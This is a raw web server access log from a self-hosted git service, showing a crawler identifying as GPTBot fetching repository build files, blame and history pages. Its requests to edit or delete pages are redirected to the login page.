-] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" -[17/Feb/2026:16:59:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/project.nuget.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/project.nuget.cache" -[17/Feb/2026:16:59:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/project.nuget.cache" -[17/Feb/2026:16:59:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/obj/project.nuget.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/project.nuget.cache" -[17/Feb/2026:16:59:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/obj/project.nuget.cache" -[17/Feb/2026:16:59:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 11796] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj" -[17/Feb/2026:16:59:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 74.7.227.38] [Length 11114] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" -[17/Feb/2026:16:59:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:59:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:59:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:59:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:59:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:16:59:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9969] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&state=all&type=all" -[17/Feb/2026:16:59:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26365] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:16:59:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.nuget.cache?display=source" [Client 74.7.227.38] [Length 12408] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.nuget.cache" -[17/Feb/2026:16:59:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.assets.json" [Client 74.7.227.38] [Length 37458] [Gzip 11.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj" -[17/Feb/2026:16:59:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" -[17/Feb/2026:16:59:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" -[17/Feb/2026:16:59:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 9840] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" -[17/Feb/2026:16:59:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 10842] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" -[17/Feb/2026:16:59:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" -[17/Feb/2026:16:59:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 1084] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" -[17/Feb/2026:16:59:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" -[17/Feb/2026:16:59:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" -[17/Feb/2026:16:59:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" -[17/Feb/2026:16:59:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" -[17/Feb/2026:16:59:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" -[17/Feb/2026:16:59:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" -[17/Feb/2026:16:59:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:16:59:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" -[17/Feb/2026:16:59:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" -[17/Feb/2026:16:59:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/project.assets.json" [Client 74.7.227.38] [Length 9824] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.assets.json" -[17/Feb/2026:16:59:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/project.assets.json" [Client 74.7.227.38] [Length 919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.assets.json" -[17/Feb/2026:16:59:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/project.assets.json" [Client 74.7.227.38] [Length 49059] [Gzip 21.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.assets.json" -[17/Feb/2026:16:59:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/project.assets.json" [Client 74.7.227.38] [Length 52830] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.assets.json" -[17/Feb/2026:16:59:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" -[17/Feb/2026:16:59:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" -[17/Feb/2026:16:59:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" -[17/Feb/2026:16:59:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.targets" -[17/Feb/2026:16:59:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" -[17/Feb/2026:16:59:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props" -[17/Feb/2026:16:59:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9992] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:16:59:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 13159] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj" -[17/Feb/2026:17:00:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32933] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:17:00:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10643] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:17:00:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10657] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:17:00:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10655] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1" -[17/Feb/2026:17:00:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/TestApp" -[17/Feb/2026:17:00:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10922] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/TestApp" -[17/Feb/2026:17:00:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16203] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/Makefile" -[17/Feb/2026:17:00:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16204] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/Makefile" -[17/Feb/2026:17:00:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16204] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/Makefile" -[17/Feb/2026:17:00:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16176] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/Makefile" -[17/Feb/2026:17:00:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json?display=rendered" [Client 74.7.227.38] [Length 11172] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" -[17/Feb/2026:17:00:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 12991] [Gzip 6.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" -[17/Feb/2026:17:00:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14320] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 